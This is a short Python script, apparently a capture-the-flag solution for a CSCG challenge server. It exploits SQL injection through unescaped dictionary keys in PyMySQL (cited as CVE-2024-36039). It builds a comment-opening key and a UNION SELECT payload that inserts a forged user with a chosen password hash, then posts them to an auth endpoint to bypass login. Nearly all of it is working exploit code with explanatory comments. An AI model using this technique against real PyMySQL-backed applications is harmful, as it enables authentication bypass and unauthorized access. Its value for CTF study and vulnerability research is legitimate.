32 lines
1.0 KiB
Python
32 lines
1.0 KiB
Python
import requests
|
|
import hashlib
|
|
|
|
BASE_URL = "https://usylj6lnspfp6iquvda5y7tlxu-5000-ass.challenge.cscg.live/"
|
|
TOKEN = "crazypassword"
|
|
|
|
def password_hash(password: str) -> str:
|
|
return hashlib.sha256(password.encode()).hexdigest()
|
|
|
|
token_hash = password_hash(TOKEN)
|
|
print(f"[*] Hash: {token_hash}")
|
|
|
|
# 1. First key: Parses as a User object, bypasses quotes, and opens the comment block.
|
|
# Regex requires: 4-10 chars, 7+ chars, 2 uppercase chars.
|
|
key_open = "fn/*,1234567,XX"
|
|
|
|
# 2. Second key: Because of CVE-2024-36039, PyMySQL does NOT escape dict keys!
|
|
# Python wraps it in double quotes, but MariaDB will ignore the opening quote
|
|
# because it falls inside our /* */ comment block.
|
|
key_payload = "*/ PI()}) UNION SELECT 1,'hacker','" + token_hash + "','us',1 #"
|
|
|
|
# Python dicts preserve order!
|
|
# fn/* comes first, opening the comment.
|
|
# The payload comes second, closing the comment and injecting.
|
|
r = requests.post(f"{BASE_URL}/api/auth", json=[{
|
|
key_open: "irrelevant",
|
|
key_payload: "also irrelevant",
|
|
"token": TOKEN
|
|
}])
|
|
|
|
print("[*] Auth:", r.json())
|